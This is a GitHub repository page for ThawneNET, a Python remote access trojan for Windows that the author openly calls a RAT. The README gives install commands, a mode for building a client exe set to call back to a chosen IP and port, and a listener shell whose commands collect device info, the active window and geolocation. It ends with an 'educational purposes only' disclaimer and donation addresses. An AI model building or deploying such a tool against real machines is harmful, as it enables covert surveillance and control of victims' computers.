Skip to content

cisamu123/ThawneNet

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

12 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

ThawneNET

I apologize for the fact that RAT has little functionality because I wanted to expand it gradually, so updates will be very frequent, if you are planning to use this RAT, check for updates more often

LEGAL DISCLAIMER PLEASE READ!

I, the creator and all those associated with the development and production of this program are not responsible for any actions and or damages caused by this software. You bear the full responsibility of your actions and acknowledge that this software was created for educational purposes only. This software's intended purpose is NOT to be used maliciously, or on any system that you do not have own or have explicit permission to operate and use this program on. By using this software, you automatically agree to the above.

MIT License GitHub followers LinkedIn Badge LinkedIn Badge

ThawneNET is a tool designed to give the control of the windows system remotely and retrieve informations from it. ThawneNET is a client/server application developed in Python Windows for the client side and the Server is also in Python.

Screenshots

ThawneNET

Prerequisites

ThawneNET requires Python3

Installation

git clone https://github.com/cisamu123/ThawneNet.git
cd ThawneNET
pip install -r requirements.txt
```.

### Available Modes
* `--build` - for building the exe
* `--shell` - getting an interactive shell of the device

build mode

Usage: python3 server.py --build

shell mode

Usage: python3 server.py --shell [flags] Flags: -i, --ip Listner IP address -p, --port Listner port number

After running the shell mode you will get an interpreter of the device

Commands which can run on the interpreter

    info                       --> returns basic info of the device
    activeWindow               --> returns active window
    battery                    --> returns battery info
    whois                      --> returns the ip, city, country etc of the device
    clear                      --> clears the screen
    exit                       --> exit the interpreter

Examples

  • To build the exe using desired ip and port: python3 server.py --build

  • To get the interpreter: python3 server.py --shell -i 0.0.0.0 -p 8000

Interpreter Examples

  • Generating EXE

TODO

  • Linux, MacOS (Darwin) Support
  • Set up multi client
  • Fix Bugs
  • Maybe GUI version
  • Add new functions

💰 Donate:

BTC: bc1q5exw2v9sa0yktp2t7xnq8ma2xpn5a29s7w283y
ETH: 0x8d797249170d263B959A3c688D8456adBcfBC319
XMRT: 0xF978FE35d00A201eB48aB3908993e14f312001a2

License

ThawneNET is licensed under MIT license take a look at the LICENSE for more information.

Releases

No releases published

Packages

No packages published

Languages